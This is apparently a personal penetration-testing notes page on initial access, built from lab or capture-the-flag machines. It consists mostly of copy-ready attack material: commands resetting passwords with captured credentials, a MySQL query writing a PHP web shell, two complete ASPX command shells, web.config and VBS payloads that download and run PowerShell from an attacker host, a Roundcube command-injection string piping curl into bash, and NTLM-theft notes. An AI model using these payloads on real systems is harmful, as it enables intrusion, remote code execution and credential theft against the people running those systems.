Malleum Knowledge Base

3. Initial Access

3 min read

Unsecure Credential

STATUS_PASSWORD_MUST_CHANGE

smbpasswd.py -newpass Password123! caroline.robinson@10.10.127.198

changepasswd.py 'caroline.robinson:BabyStart123!'@10.10.66.196 -newpass 'Password123!'

OLD Machine Account

pre2k auth -u trainee -p trainee -dc-ip 10.10.122.154 -d retro.vl

krb5.conf

kpasswd banking$

banking

mysql root acceess and phpinfo to add shell.php

mysql -h 10.10.244.198 -u root -p

select '<?php echo "command: " . system($_REQUEST["cmd"]); ?>' into outfile "C:\\xampp\\htdocs\\dev\\shell.php";

Aspx shell

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string test(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(test(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"


<div class="post page-global"> <h2 class="page-global-title">Command Shell</h2> <form method="get" action=""> <input type="text" name="cmd" placeholder="Enter command" /> <input type="submit" value="Execute" /> </form> <pre> <% string cmd = Request.QueryString["cmd"]; if (!string.IsNullOrEmpty(cmd)) { System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = "/c " + cmd; proc.StartInfo.RedirectStandardOutput = true; proc.StartInfo.UseShellExecute = false; proc.StartInfo.CreateNoWindow = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); proc.WaitForExit(); Response.Write(output); } %> </pre> </div> </div> </div> </div>

SE Impersonate ( Method 3 Godpotato donut)

ASP web.config rce

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="cmd.exe" arguments="/c powershell.exe -Command &quot;IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')&quot;" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->


<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="cmd.exe" arguments="/c powershell.exe -Command &quot;IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/large.ps1')&quot; > c:\webaccounting\file.txt" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Roundcube’s “markasjunk” plugin Authenticated

  • Authenticate
  • Resource Dev from Challenge 6 linux
  • Send mail to self as
peter.turner&curl${IFS}10.8.2.41/bad.sh${IFS}|${IFS}bash&@hybrid.vl

https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FHybrid%2FWriteup

https://cyberthint.io/roundcube-markasjunk-command-injection-vulnerability/

VBS script

Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")
 
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

Sub ExecutePowerShellScript()
    Dim oShell
    Set oShell = CreateObject("WScript.Shell")
    oShell.Run "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.41/large1.ps1')", 0, False
    Set oShell = Nothing
End Sub

' Call the PowerShell script execution
ExecutePowerShellScript()

' Map network drives
MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
MapNetworkShare "\\10.8.2.41\docs", "Z"

NTLM Theft

Write Access on SMB share

Ntlm theft by uploading files on SMB share

Media player file upload

NTLM Theft after uploading video file.

JEA shell

evil-jea connect adfs_svc 'S3cur!ty' 192.168.20.15

Theory on

Graph View

Backlinks